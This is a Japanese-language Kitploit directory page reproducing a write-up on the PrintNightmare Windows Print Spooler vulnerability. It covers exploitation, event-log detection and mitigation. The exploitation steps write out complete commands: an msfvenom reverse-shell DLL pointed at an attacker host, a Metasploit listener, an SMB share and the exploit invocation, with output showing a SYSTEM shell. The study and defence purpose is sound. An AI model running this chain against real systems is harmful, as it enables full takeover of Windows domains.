Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-1675-PrintNightmare-Analysis — PrintNightmare (CVE-2021-1675 / CVE-2021-34527) の技術解説と分析。RCE/LPE の悪用、Windows イベントログによる検出、Print Spooler の緩和策を網羅しています。 | Kitploit
ツール/GitHubGitHub/velessecurity/cve-2021-1675-printnightmare-analysis
特権昇格偵察脆弱性分析エクスプロイトペネトレーションテスト論文と研究学習と教育インシデントレスポンスログ分析

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubvelessecurity/cve-2021-1675-printnightmare-analysis

CVE-2021-1675-PrintNightmare-Analysis

PrintNightmare (CVE-2021-1675 / CVE-2021-34527) の技術解説と分析。RCE/LPE の悪用、Windows イベントログによる検出、Print Spooler の緩和策を網羅しています。

リポジトリを見る
522日前未レビュー

脆弱性リサーチ:Windows Print Spoolerを介したローカル権限昇格とRCE(PrintNightmare / CVE-2021-1675)

このリポジトリには、低権限のドメインユーザーが最大のシステム権限で任意のコードをリモート実行できるようにする、Windowsプリントマネージャーサービス(Print Spooler)の重大な脆弱性の詳細な技術レポート(Write-up)とエクスプロイト概念の分析が含まれています。

🛑 警告と免責事項: この資料は、教育目的および合法的なセキュリティ監査(ペンテスト)の実施のみを目的として作成されています。所有者の事前の書面による同意なしにシステムに対して説明された手法を使用することは、法律で罰せられます。


📌 研究の重要性とコンテキスト

PrintNightmare ファミリーの脆弱性は、Windows Server および Active Directory をベースとした企業環境にとって重大な脅威です。MS-RPRN(Print System Remote Protocol)および MS-PAR(Print System Asynchronous Remote Protocol)の RPC インターフェースにおける権限検証のアーキテクチャ上の欠陥により、リモートサーバー上でプリンタードライバーのインストールを正当に要求することが可能になります。

主な危険性は、デフォルトではプリントマネージャーサービス(spoolsv.exe)がほとんどのサーバー(ドメインコントローラー (Domain Controllers) を含む)でアクティブであり、最高権限のコンテキスト NT AUTHORITY\SYSTEM で動作していることです。単一の低権限アカウント(例: フィッシングによる)が侵害されると、攻撃者は Active Directory インフラストラクチャ全体を即座に完全に制御できるようになります。


🏗 研究のアーキテクチャとスタック

  • 目的: RPC 印刷インターフェースを介したリモート Windows ホストの制御の取得。
  • 攻撃ベクトル: RPC Remote Driver Load → DLL Injection → SYSTEM Privileges.
  • ツール: impacket (rpcdump、smbserver)、msfvenom、Metasploit Framework、Python エクスプロイト。

📈 実践的なエクスプロイトの流れ

ステップ 1. 偵察と資格情報の収集 (Reconnaissance)

リモートコード実行(RCE)ベクトルを実現するには、最小権限を持つ有効なドメインユーザー資格情報が必要です(調査条件で提供されています)。

  • サービスの基本監査: 対象の Windows マシンでは Print Spooler サービス(spoolsv.exe)がアクティブであり、最高権限 SYSTEM で動作しています。これにより、信頼されていないライブラリを読み込ませることを通じて、ホスト上でローカル権限昇格(LPE)を直接行う可能性が開かれます。

ステップ 2. RPC インターフェースのスキャン (Scanning)

メインのエクスプロイトを実行する前に、リモートマシンが脆弱な印刷プロトコルを提供しており、ネットワーク通信に対して開放されていることを確認する必要があります。対象システムの RPC インターフェースを調査します:

root@kitploit:~
impacket-rpcdump @<TARGET_IP> | egrep 'MS-RPRN|MS-PAR'

確認用ターミナル出力:

root@kitploit:~
Protocol: [MS-RPRN], Endpoint: [\pipe\spoolss]
Protocol: [MS-PAR], Endpoint: [\pipe\spoolss]
  • ステージのインサイト: 対象ホストはプロトコル文字列 [MS-RPRN] と [MS-PAR] を正常に返しました。これは、システムが必要なリモート印刷インターフェースをサポートしており、PrintNightmare ベクトルに対して脆弱であることを100%確認します。

ステップ 3. ペイロードとインフラの準備 (Weaponization)

1. リバースシェルを備えた悪意のある DLL の生成:

x64 アーキテクチャ用のペイロードを作成し、リバースネットワーク接続のために攻撃マシンの IP アドレスを指定します:

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -f dll -o /tmp/malicious.dll

2. Metasploit でのバックグラウンドリスナーの起動:

root@kitploit:~
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST <ATTACKER_IP>; set LPORT 4444; run -j"

3. ローカル SMB 共有の展開:

対象の Windows サーバーは、サードパーティ製ユーティリティを使用せずに、ネットワーク経由で当社の DLL ライブラリをダウンロードする正当な方法を持っている必要があります。/tmp フォルダーから SMBv2 プロトコルをサポートする SMB サーバーを起動します:

root@kitploit:~
sudo impacket-smbserver tmp /tmp -smb2support

ステップ 4. エクスプロイトとシステムの奪取 (Exploitation)

エクスプロイトの Python スクリプトを実行し、低権限のドメインユーザー資格情報と、ローカル SMB 共有上の悪意のあるライブラリへの UNC パスを渡します:

root@kitploit:~
python3 CVE-2021-1675.py <LOW_PRIV_USER>:<PASSWORD>@<TARGET_IP> '\\<ATTACKER_IP>\tmp\malicious.dll'

セッション奪取成功のログ (Metasploit):

root@kitploit:~
[*] Started reverse TCP handler on <ATTACKER_IP>:4444 
[*] Sending stage (200574 bytes) to <TARGET_IP>
[*] Meterpreter session 1 opened (<ATTACKER_IP>:4444 -> <TARGET_IP>:49321)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
Process 3412 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1935]
(c) Корпорация Майкрософт (Microsoft Corporation). Все права защищены.

C:\Windows\system32> whoami
nt authority\system
  • 結果: エクスプロイトの起動後、リモートのプリンターサービスはネットワークフォルダーから悪意のあるドライバーを正常にロードしました。Metasploit では最高権限 NT AUTHORITY\SYSTEM を持つ Meterpreter セッションが開かれました。ターゲットは完全に侵害されました。

🔍 侵害の指標と検知 (Detection)

Blue Team の担当者にとって、PrintNightmare のエクスプロイトの検知は、Windows システムログの監査とプロセスの異常なアクティビティの追跡に基づいています。

1. Windows イベントの監視 (Event Logs)

エクスプロイトが正常に起動すると、印刷ログとシステムログに特徴的なエントリが残ります:

  • Event ID 808 (PrintService): プリンターモジュールの障害または非典型的な読み込みの記録。読み込まれたサードパーティ製 DLL の名前(例: C:\Windows\System32\spool\drivers\x64\3\ 内のパス)を確認できます。
  • Event ID 7031 (System): エクスプロイトの不安定な動作によって引き起こされた、プリントマネージャーサービス(Print Spooler)の突然の強制再起動。

2. プロセスの動作 (EDR / Sysmon)

  • 異常な子プロセスアクティビティ: 親プロセスがプリントマネージャーのシステムプロセス spoolsv.exe である、コマンドライン処理プロセス(cmd.exe、powershell.exe)または情報収集ユーティリティの出現。正規の状況では、spoolsv.exe がコマンドシェルを生成することは決してありません。
  • ネットワークアクティビティ: ドライバーファイルをダウンロードするために、プロセス spoolsv.exe が外部 SMB リソース(ポート 445)への発信ネットワーク接続を確立する。

🛡 脆弱性の緩和に関する推奨事項 (Mitigation)

  1. サービスの完全な無効化(推奨): サーバーが印刷機能を実行していない場合(特にドメインコントローラー上では)、Print Spooler サービスを完全に無効化し、Disabled モードに設定する必要があります。
  2. リモート印刷の制限: グループポリシー(GPO)を介してリモート印刷の機能を無効化します:
    • Computer Configuration -> Administrative Templates -> Printers -> Allow Print Spooler to accept client connections (Disabled).
  3. 更新プログラムの適用: 印刷サブシステムにおけるリモートコード実行の脆弱性を解決するために、Microsoft の公式セキュリティ更新プログラム (KB) を適時に適用します。

🔗 参考リンクと資料

  • CVE データベース: NIST NVD - CVE-2021-1675 | NIST NVD - CVE-2021-34527
  • 分析記事: Microsoft Security Update Advisory
ツールをダウンロード